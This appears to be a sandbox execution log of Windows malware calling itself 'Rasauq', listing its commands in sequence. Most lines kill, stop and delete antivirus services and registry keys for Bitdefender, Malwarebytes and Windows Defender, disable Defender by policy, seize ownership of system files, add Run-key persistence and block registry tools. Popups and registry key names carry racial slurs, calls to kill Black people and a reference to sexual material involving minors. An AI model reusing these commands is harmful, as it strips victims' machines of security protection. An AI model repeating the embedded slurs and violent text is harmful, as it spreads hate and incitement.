taskkill /F /IM mbamtray.exe /T
C:\Windows\system32\sc.exe
sc stop vsserv
C:\Windows\system32\sc.exe
sc delete vsserv
C:\Windows\system32\sc.exe
sc stop epssecurityservice
C:\Windows\system32\sc.exe
sc delete epssecurityservice
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f
C:\Windows\system32\taskkill.exe
taskkill /F /IM mbamscheduler.exe /T
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f
C:\Windows\system32\sc.exe
sc stop MBAMService
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f
C:\Windows\system32\sc.exe
sc delete MBAMService
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f
C:\Windows\system32\sc.exe
sc stop MBAMProtector
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\sc.exe
sc delete MBAMProtector
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f
C:\Windows\system32\sc.exe
sc stop MBAMChameleon
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f
C:\Windows\system32\sc.exe
sc delete MBAMChameleon
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f
C:\Windows\system32\sc.exe
sc stop MBAMFarflt
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc delete WinDefend
C:\Windows\system32\sc.exe
sc delete MBAMFarflt
C:\Windows\system32\sc.exe
sc stop SecurityHealthService
C:\Windows\system32\sc.exe
sc stop MBAMSwissArmy
C:\Windows\system32\sc.exe
sc delete SecurityHealthService
C:\Windows\system32\sc.exe
sc delete MBAMSwissArmy
C:\Windows\system32\sc.exe
sc stop Sense
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f
C:\Windows\system32\sc.exe
sc delete Sense
C:\Windows\system32\taskkill.exe
taskkill /F /IM MsMpEng.exe /T
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f
C:\Windows\system32\taskkill.exe
taskkill /F /IM MpCmdRun.exe /T
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdservicehost.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM SecurityHealthSystray.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdagent.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM smartscreen.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdredline.exe /T
C:\Windows\system32\takeown.exe
takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdparentalservice.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdreinit.exe /T
C:\Windows\system32\takeown.exe
takeown /f "C:\Program Files\Windows Defender" /r /d y
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdsubwiz.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM seccenter.exe /T
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f
C:\Windows\system32\taskkill.exe
taskkill /F /IM vsserv.exe /T
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\notepad.exe /a /r /d y
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q
C:\Windows\system32\taskkill.exe
taskkill /F /IM epssecurityservice.exe /T
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\calc.exe /a /r /d y
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q
C:\Windows\system32\sc.exe
sc stop bdservicehost
C:\Windows\system32\sc.exe
sc delete bdservicehost
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y
C:\Windows\system32\sc.exe
sc stop bdagent
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q
C:\Windows\system32\sc.exe
sc delete bdagent
C:\Windows\system32\sc.exe
sc stop bdredline
C:\Windows\system32\sc.exe
sc delete bdredline
C:\Windows\system32\sc.exe
sc stop bdparentalservice
C:\Windows\system32\powercfg.exe
powercfg /hibernate off REM Disables hibernation
C:\Windows\system32\sc.exe
sc delete bdparentalservice
C:\Windows\system32\powercfg.exe
powercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in
C:\Windows\system32\sc.exe
sc stop bdreinit
C:\Windows\system32\powercfg.exe
powercfg /change standby-timeout-dc 0 REM Prevents sleep on battery
C:\Windows\system32\powercfg.exe
powercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in
C:\Windows\system32\sc.exe
sc delete bdreinit
C:\Windows\system32\powercfg.exe
powercfg /devicedisablewake "Device Name"
C:\Windows\system32\sc.exe
sc stop bdsubwiz
C:\Windows\system32\sc.exe
sc delete bdsubwiz
C:\Windows\system32\sc.exe
sc stop seccenter
C:\Windows\system32\sc.exe
sc delete seccenter
C:\Windows\system32\sc.exe
sc stop vsserv
C:\Windows\system32\sc.exe
sc delete vsserv
C:\Windows\system32\sc.exe
sc stop epssecurityservice
C:\Windows\system32\sc.exe
sc delete epssecurityservice
C:\Windows\system32\powercfg.exe
powercfg /devicedisablewake "USB Root Hub"
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCR\behead all niggers" /f
C:\Windows\system32\reg.exe
reg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f
C:\Windows\system32\reg.exe
reg query "HKU" /s /f "Software" /k
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc delete WinDefend
C:\Windows\system32\sc.exe
sc stop SecurityHealthService
C:\Windows\system32\sc.exe
sc delete SecurityHealthService
C:\Windows\system32\sc.exe
sc stop Sense
C:\Windows\system32\sc.exe
sc delete Sense
C:\Windows\system32\taskkill.exe
taskkill /F /IM MsMpEng.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM MpCmdRun.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM SecurityHealthSystray.exe /T
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\Software\Software\Rasauq on top" /f
C:\Windows\system32\taskkill.exe
taskkill /F /IM smartscreen.exe /T
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f
C:\Windows\system32\takeown.exe
takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Software\Rasauq on top" /f
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\AppDataLow\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Program Files\Windows Defender" /r /d y
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "Suchvorgang abgeschlossen: 20 übereinstimmende Zeichenfolge(n) gefunden.\Software\Rasauq on top" /f
C:\Windows\system32\msg.exe
msg * /time:3 "This machine has been compromised by Rasuaq"
C:\Windows\system32\timeout.exe
timeout /t 3 /nobreak
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\notepad.exe /a /r /d y
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\calc.exe /a /r /d y
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q
C:\Windows\system32\powercfg.exe
powercfg /hibernate off REM Disables hibernation
C:\Windows\system32\powercfg.exe
powercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in
C:\Windows\system32\powercfg.exe
powercfg /change standby-timeout-dc 0 REM Prevents sleep on battery
C:\Windows\system32\powercfg.exe
powercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in
C:\Windows\system32\powercfg.exe
powercfg /devicedisablewake "Device Name"
C:\Windows\system32\powercfg.exe
powercfg /devicedisablewake "USB Root Hub"
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCR\behead all niggers" /f
C:\Windows\system32\reg.exe
reg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k
C:\Windows\system32\reg.exe
reg query "HKU" /s /f "Software" /k
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\AppDataLow\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\AppDataLow\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "Suchvorgang abgeschlossen: 39 übereinstimmende Zeichenfolge(n) gefunden.\Software\Rasauq on top" /f
C:\Windows\system32\msg.exe
msg * /time:3 "This machine has been compromised by Rasuaq"
C:\Windows\system32\timeout.exe
timeout /t 3 /nobreak
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x308,0x7ff98630f208,0x7ff98630f214,0x7ff98630f220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=de --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1868,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=2112 /prefetch:11
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1752,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=1884 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=de --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2500,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=2616 /prefetch:13
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3400,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=3484 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3408,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
